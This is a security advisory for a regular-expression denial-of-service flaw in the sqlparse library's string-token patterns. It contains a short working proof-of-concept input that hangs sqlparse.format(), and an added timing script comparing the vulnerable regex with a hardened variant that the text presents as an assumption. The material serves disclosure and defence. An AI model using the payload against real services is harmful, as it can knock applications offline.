Coordinated Disclosure Timeline
- 2023-01-27: Report Sent
- 2023-04-18: Vulnerability patched along with advisory release
sqlparse has a ReDoS (regular expression denial of service) in the parser for SQL expressions.
Issue: ReDoS in
Both the String.Single and the String.Symbol regular expressions are vulnerable:

```python
SQL_REGEX = [
    ...
    (r"'(''|\\\\|\\'|[^'])*'", tokens.String.Single),
    ...
    (r'"(""|\\\\|\\"|[^"])*"', tokens.String.Symbol),
    ...
]
```
This issue was found using the following CodeQL query
This vulnerability may lead to Denial of Service (DoS).
Proof of Concept
The following code uses the sqlparse.format() function to parse an attacker-controlled string, leading to a denial of service condition:

```python
import sqlparse

# An opening quote followed by a long run of backslashes and no closing quote
attack = "'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"
res = sqlparse.format(attack)
print(res)
```
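The following is an added illustration (not code from the advisory or from sqlparse) of why the String.Single pattern above blows up on the proof-of-concept input, and of how a defender can check a candidate fix. It quotes the vulnerable regex from the advisory; the hardened variant, which simply drops the redundant `\\\\` alternative, is an assumption written for this example and is not quoted from the upstream patch.

```python
import re
import time

# Vulnerable pattern as quoted in the advisory (sqlparse String.Single token).
VULNERABLE_SINGLE = re.compile(r"'(''|\\\\|\\'|[^'])*'")
# Hardened variant (assumption for illustration, not the upstream patch): the
# "\\\\" alternative is dropped because "[^']" already consumes a backslash, so
# a run of backslashes has exactly one way to be split by the engine.
HARDENED_SINGLE = re.compile(r"'(''|\\'|[^'])*'")


def unterminated_literal(n: int) -> str:
    """Constructed input: opening quote, n backslashes, no closing quote.
    With no terminator the engine must try every split of the run before failing."""
    return "'" + "\\" * n


def backtracking_paths(n: int) -> int:
    """Ways the vulnerable alternation can consume n backslashes: each one is
    either a lone "[^']" or half of a "\\\\" pair, i.e. the number of tilings
    of length n by 1s and 2s, which grows roughly like 1.618 ** n."""
    one, two = 1, 1  # path counts for runs of length 0 and 1
    for _ in range(n):
        one, two = two, one + two
    return one


def token_end(pattern: re.Pattern, text: str):
    """Length of the string token the lexer would emit for text, or None."""
    m = pattern.match(text)
    return m.end() if m else None


def seconds_to_match(pattern: re.Pattern, n: int) -> float:
    start = time.perf_counter()
    pattern.match(unterminated_literal(n))
    return time.perf_counter() - start


# Constructed well-formed literals: a fix must still emit the same token for these.
SAMPLES = ["'abc'", "'it''s'", "'a\\'b'", "'a\\\\b'", "'a\\\\'", "''"]

if __name__ == "__main__":
    for s in SAMPLES:
        assert token_end(VULNERABLE_SINGLE, s) == token_end(HARDENED_SINGLE, s)
    for n in (16, 20, 24, 28):
        print(f"vulnerable n={n}: {backtracking_paths(n):>7} paths, "
              f"{seconds_to_match(VULNERABLE_SINGLE, n):.3f}s")
    print(f"hardened n=10000: {seconds_to_match(HARDENED_SINGLE, 10000):.3f}s")
```

Running it shows the vulnerable match time growing by a constant factor for every few extra backslashes, while the hardened pattern rejects a 10000-character unterminated literal in linear time.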
This issue was discovered by @erik-krogh (Erik Krogh Kristensen).
You can contact the GHSL team at email@example.com; please include a reference to GHSL-2023-001 in any communication regarding this issue.